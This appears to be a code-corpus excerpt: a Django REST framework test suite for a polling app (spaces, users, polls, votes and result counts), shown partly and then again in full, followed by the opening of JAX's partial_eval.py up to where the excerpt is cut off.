self.client.get('/poll/getPendingInSpace/4/') self.assertEqual(len(response.data), 0) class getPendingPollsByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 
1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Yun'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Xiao'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': True, 'name': 'Vivian'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': False, 'name': 'Ua'}, format='json') def test_get_from_user_w_2_pending_polls(self): response = self.client.get('/poll/getPendingByUser/1/') self.assertEqual(len(response.data), 2) def test_get_from_user_w_no_pending_polls(self): response = self.client.get('/poll/getPendingByUser/2/') self.assertEqual(len(response.data), 0) def test_get_from_user_w_1_pending_poll(self): response = self.client.get('/poll/getPendingByUser/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_user(self): response = self.client.get('/poll/getPendingByUser/4/') self.assertEqual(len(response.data), 0) class getPendingUnvotedPollsForUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') 
self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': False}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 6, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 7, 'user': 2, 'result': True}, format='json') def test_get_for_user_w_1_unvoted_poll(self): response = self.client.get('/poll/getPendingUnvotedForUser/1/') self.assertEqual(len(response.data), 1) def test_get_for_user_w_3_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/2/') self.assertEqual(len(response.data), 3) def test_get_for_user_w_4_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/3/') self.assertEqual(len(response.data), 4) def test_get_for_missing_user(self): response = self.client.get('/poll/getPendingUnvotedForUser/4/') self.assertEqual(len(response.data), 0) class getPendingJoinPollInSpaceByNameTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Zaray'}, 
format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 1, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Xiao'}, format='json') def test_get_unique_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/3/Xiao/') self.assertEqual(response.status_code, status.HTTP_200_OK) def test_get_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Zaray/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertIn('space', response.data) self.assertEqual(response.data['space'], 1) def test_fail_get_missing_but_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Xiao/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_recurring_name_from_missing_space(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/4/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_join_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Yon/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getNamePollResultsInSpaceByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, 
format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Daphne', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 3}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 3}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 3, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 6, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'user': 8, 'name': 'Xiao'}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 4, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 5, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 7, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 9, 'result': True}, format='json') def test_get_results_3u_1p_2n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/1/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 2) 
self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/2/6/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_1u_1p_0n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/3/8/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 1) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) def test_fail_get_by_user_w_no_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/4/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_for_missing_user(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/10/') def test_fail_get_non_name_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/2/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/3/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getJoinPollResultsTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 
'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Delphine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 3, 'result': True}, format='json') def test_get_results_3u_2p_1n_for_missing_user(self): response = self.client.get('/poll/getJoinResults/1/Zaray/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n_for_user(self): response = self.client.get('/poll/getJoinResults/2/Alex/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_2p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/3/Celine/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) self.assertIn('id', 
response.data['user']) self.assertEqual(response.data['user']['id'], 3) def test_get_results_3u_0p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/4/Bob/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 0) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertNotIn('user', response.data) def test_fail_get_results_for_missing_poll(self): response = self.client.get('/poll/getJoinResults/5/Alex/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class createNameRelatedPollTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'name': 'Zaray'}, format='json') def test_create_nr_poll_w_unique_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Bob'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_create_nr_poll_w_recurring_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_fail_create_nr_poll_w_matching_nr_poll_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Zaray'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_w_matching_user_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_in_missing_space(self): response = 
self.client.post('/poll/createNameRelated/', {'space': 3, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Invalid", status_code=status.HTTP_400_BAD_REQUEST)
from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient class getPendingPollsInSpaceTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False}, format='json') def test_get_from_space_w_2_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/1/') self.assertEqual(len(response.data), 2) def test_get_from_space_w_no_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/2/') self.assertEqual(len(response.data), 0) def test_get_from_space_w_1_pending_poll(self): response = self.client.get('/poll/getPendingInSpace/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_space(self): response = self.client.get('/poll/getPendingInSpace/4/') self.assertEqual(len(response.data), 0) class getPendingPollsByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 
1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Yun'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Xiao'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': True, 'name': 'Vivian'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': False, 'name': 'Ua'}, format='json') def test_get_from_user_w_2_pending_polls(self): response = self.client.get('/poll/getPendingByUser/1/') self.assertEqual(len(response.data), 2) def test_get_from_user_w_no_pending_polls(self): response = self.client.get('/poll/getPendingByUser/2/') self.assertEqual(len(response.data), 0) def test_get_from_user_w_1_pending_poll(self): response = self.client.get('/poll/getPendingByUser/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_user(self): response = self.client.get('/poll/getPendingByUser/4/') self.assertEqual(len(response.data), 0) class getPendingUnvotedPollsForUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') 
self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': False}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 6, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 7, 'user': 2, 'result': True}, format='json') def test_get_for_user_w_1_unvoted_poll(self): response = self.client.get('/poll/getPendingUnvotedForUser/1/') self.assertEqual(len(response.data), 1) def test_get_for_user_w_3_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/2/') self.assertEqual(len(response.data), 3) def test_get_for_user_w_4_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/3/') self.assertEqual(len(response.data), 4) def test_get_for_missing_user(self): response = self.client.get('/poll/getPendingUnvotedForUser/4/') self.assertEqual(len(response.data), 0) class getPendingJoinPollInSpaceByNameTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Zaray'}, 
format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 1, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Xiao'}, format='json') def test_get_unique_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/3/Xiao/') self.assertEqual(response.status_code, status.HTTP_200_OK) def test_get_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Zaray/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertIn('space', response.data) self.assertEqual(response.data['space'], 1) def test_fail_get_missing_but_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Xiao/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_recurring_name_from_missing_space(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/4/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_join_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Yon/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getNamePollResultsInSpaceByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, 
format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Daphne', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 3}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 3}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 3, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 6, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'user': 8, 'name': 'Xiao'}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 4, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 5, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 7, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 9, 'result': True}, format='json') def test_get_results_3u_1p_2n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/1/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 2) 
self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/2/6/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_1u_1p_0n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/3/8/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 1) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) def test_fail_get_by_user_w_no_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/4/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_for_missing_user(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/10/') def test_fail_get_non_name_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/2/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/3/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getJoinPollResultsTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 
'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Delphine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 3, 'result': True}, format='json') def test_get_results_3u_2p_1n_for_missing_user(self): response = self.client.get('/poll/getJoinResults/1/Zaray/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n_for_user(self): response = self.client.get('/poll/getJoinResults/2/Alex/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_2p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/3/Celine/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) self.assertIn('id', 
response.data['user']) self.assertEqual(response.data['user']['id'], 3) def test_get_results_3u_0p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/4/Bob/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 0) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertNotIn('user', response.data) def test_fail_get_results_for_missing_poll(self): response = self.client.get('/poll/getJoinResults/5/Alex/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class createNameRelatedPollTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'name': 'Zaray'}, format='json') def test_create_nr_poll_w_unique_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Bob'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_create_nr_poll_w_recurring_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_fail_create_nr_poll_w_matching_nr_poll_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Zaray'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_w_matching_user_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_in_missing_space(self): response = 
self.client.post('/poll/createNameRelated/', {'space': 3, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Invalid", status_code=status.HTTP_400_BAD_REQUEST)
none
1
2.419676
2
jax/interpreters/partial_eval.py
dpiponi/jax
0
6627901
<reponame>dpiponi/jax # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import itertools as it from collections import namedtuple import contextlib import threading from typing import Callable, Dict, Optional, Sequence, Set, Tuple, Type, Union from weakref import ref import numpy as onp from .. import core from .. import linear_util as lu from ..abstract_arrays import ShapedArray, ConcreteArray, raise_to_shaped from ..ad_util import zero from ..util import (unzip2, safe_zip, safe_map, toposort, partial, split_list, wrap_name, cache) from ..core import (Trace, Tracer, new_master, Jaxpr, Literal, get_aval, AbstractValue, unit, unitvar, abstract_unit, TypedJaxpr, new_jaxpr_eqn) map = safe_map zip = safe_zip def identity(x): return x class PartialVal(tuple): """Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. 
""" def __new__(cls, xs: Tuple[Optional[AbstractValue], core.Value]): pv, const = xs if not core.skip_checks: # type checks assert isinstance(pv, (AbstractValue, type(None))), xs assert isinstance(const, core.Tracer) or const is zero or core.valid_jaxtype(const), xs # invariant checks if isinstance(pv, AbstractValue): assert const == core.unit, xs return tuple.__new__(cls, xs) @classmethod def known(cls, const: core.Value) -> 'PartialVal': return PartialVal((None, const)) @classmethod def unknown(cls, aval: AbstractValue) -> 'PartialVal': return PartialVal((aval, core.unit)) def is_known(self): return self[0] is None def get_known(self) -> Optional[core.Value]: """Get the known value, if known, else None.""" return self[1] if self[0] is None else None def get_aval(self) -> AbstractValue: """Get the AbstractValue either directly for unknown values, or from the known constant.""" known = self.get_known() if known is not None: return get_aval(known) else: return self[0] def merge_with_known(self, val: core.Value) -> core.Value: """Either the stored known value, or the given 'val'.""" known = self.get_known() return known if known is not None else val # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the 